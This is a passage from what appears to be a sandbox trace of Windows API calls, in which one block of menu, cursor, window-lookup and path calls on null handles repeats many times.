lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.459] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.459] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.459] GetMenu (hWnd=0x0) returned 0x0 [0027.459] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x330) returned -1 [0027.459] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.459] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.459] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.459] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.459] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.459] GetStockObject (i=6) returned 0x1b00018 [0027.459] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.459] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.459] PathFileExistsW (pszPath=0x0) returned 0 [0027.459] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.459] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.459] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.459] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.459] GetMenu (hWnd=0x0) returned 0x0 [0027.459] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x45e) returned -1 [0027.459] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.459] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.459] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.459] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.460] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.460] GetStockObject (i=6) returned 0x1b00018 [0027.460] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.460] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.460] PathFileExistsW (pszPath=0x0) returned 0 [0027.460] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.460] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.460] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.460] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.460] GetMenu (hWnd=0x0) returned 0x0 [0027.460] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.460] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.460] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.460] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.460] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.460] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.460] GetStockObject (i=6) returned 0x1b00018 [0027.460] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.460] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.460] PathFileExistsW (pszPath=0x0) returned 0 [0027.460] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.460] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.460] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.460] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.460] GetMenu (hWnd=0x0) returned 0x0 [0027.460] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x332) returned -1 [0027.460] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.460] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.460] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.460] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.460] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.460] GetStockObject (i=6) returned 0x1b00018 [0027.460] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.461] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.461] PathFileExistsW (pszPath=0x0) returned 0 [0027.461] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.461] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.461] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.461] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.461] GetMenu (hWnd=0x0) returned 0x0 [0027.461] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.461] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.461] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.461] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.461] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.461] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.461] GetStockObject (i=6) returned 0x1b00018 [0027.461] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.461] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.461] PathFileExistsW (pszPath=0x0) returned 0 [0027.461] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.461] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.461] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.461] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.461] GetMenu (hWnd=0x0) returned 0x0 [0027.461] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x335) returned -1 [0027.461] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.461] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.461] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.461] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.461] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.461] GetStockObject (i=6) returned 0x1b00018 [0027.461] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.461] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.461] PathFileExistsW (pszPath=0x0) returned 0 [0027.461] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.462] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.462] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.462] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.462] GetMenu (hWnd=0x0) returned 0x0 [0027.462] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x3c0) returned -1 [0027.462] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.462] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.462] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.462] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.462] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.462] GetStockObject (i=6) returned 0x1b00018 [0027.462] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.462] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.462] PathFileExistsW (pszPath=0x0) returned 0 [0027.462] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.462] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.462] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.462] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.462] GetMenu (hWnd=0x0) returned 0x0 [0027.462] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.462] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.462] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.462] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.462] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.462] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.462] GetStockObject (i=6) returned 0x1b00018 [0027.462] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.462] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.462] PathFileExistsW (pszPath=0x0) returned 0 [0027.462] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.462] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.462] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.462] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.463] GetMenu (hWnd=0x0) returned 0x0 [0027.463] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.463] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.463] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.463] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.463] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.463] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.463] GetStockObject (i=6) returned 0x1b00018 [0027.463] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.463] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.463] PathFileExistsW (pszPath=0x0) returned 0 [0027.463] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.463] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.463] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.463] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.463] GetMenu (hWnd=0x0) returned 0x0 [0027.463] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.463] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.463] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.463] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.463] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.463] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.463] GetStockObject (i=6) returned 0x1b00018 [0027.463] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.463] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.463] PathFileExistsW (pszPath=0x0) returned 0 [0027.463] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.463] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.463] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.463] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.463] GetMenu (hWnd=0x0) returned 0x0 [0027.463] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x335) returned -1 [0027.463] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.463] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.464] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.464] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.464] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.464] GetStockObject (i=6) returned 0x1b00018 [0027.464] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.464] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.464] PathFileExistsW (pszPath=0x0) returned 0 [0027.464] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.464] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.464] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.464] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.464] GetMenu (hWnd=0x0) returned 0x0 [0027.464] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x52d) returned -1 [0027.464] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.464] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.464] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.464] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.464] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.464] GetStockObject (i=6) returned 0x1b00018 [0027.464] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.464] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.464] PathFileExistsW (pszPath=0x0) returned 0 [0027.464] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.464] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.464] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.464] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.464] GetMenu (hWnd=0x0) returned 0x0 [0027.464] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.464] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.464] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.464] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.464] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.464] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.465] GetStockObject (i=6) returned 0x1b00018 [0027.465] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.465] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.465] PathFileExistsW (pszPath=0x0) returned 0 [0027.465] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.465] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.465] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.465] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.465] GetMenu (hWnd=0x0) returned 0x0 [0027.465] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x332) returned -1 [0027.465] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.465] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.465] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.465] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.465] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.466] GetStockObject (i=6) returned 0x1b00018 [0027.466] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.466] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.466] PathFileExistsW (pszPath=0x0) returned 0 [0027.466] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.466] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.466] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.466] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.466] GetMenu (hWnd=0x0) returned 0x0 [0027.466] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.466] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.466] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.466] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.466] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.466] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.466] GetStockObject (i=6) returned 0x1b00018 [0027.466] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.466] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.466] PathFileExistsW (pszPath=0x0) returned 0 [0027.466] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.466] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.466] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.466] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.466] GetMenu (hWnd=0x0) returned 0x0 [0027.466] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.466] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.466] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.466] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.466] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.466] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.466] GetStockObject (i=6) returned 0x1b00018 [0027.466] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.467] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.467] PathFileExistsW (pszPath=0x0) returned 0 [0027.467] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.467] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.467] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.467] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.467] GetMenu (hWnd=0x0) returned 0x0 [0027.467] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x13a) returned -1 [0027.467] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.467] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.467] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.467] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.467] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.467] GetStockObject (i=6) returned 0x1b00018 [0027.467] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.467] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.467] PathFileExistsW (pszPath=0x0) returned 0 [0027.467] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.467] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.467] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.467] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.467] GetMenu (hWnd=0x0) returned 0x0 [0027.467] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.467] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.467] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.467] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.467] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.467] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.467] GetStockObject (i=6) returned 0x1b00018 [0027.467] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.467] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.467] PathFileExistsW (pszPath=0x0) returned 0 [0027.467] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.468] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.468] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.468] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.468] GetMenu (hWnd=0x0) returned 0x0 [0027.468] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.468] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.468] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.468] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.468] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.468] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.468] GetStockObject (i=6) returned 0x1b00018 [0027.468] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.468] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.468] PathFileExistsW (pszPath=0x0) returned 0 [0027.468] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.468] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.468] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.468] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.468] GetMenu (hWnd=0x0) returned 0x0 [0027.468] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.468] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.468] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.468] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.468] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.468] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.468] GetStockObject (i=6) returned 0x1b00018 [0027.468] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.468] PathAppendA (in: pszPath=0x0, pMore=0x0 